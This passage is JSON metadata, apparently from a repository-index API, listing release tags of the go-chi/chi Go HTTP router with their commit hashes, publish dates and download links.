02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.gith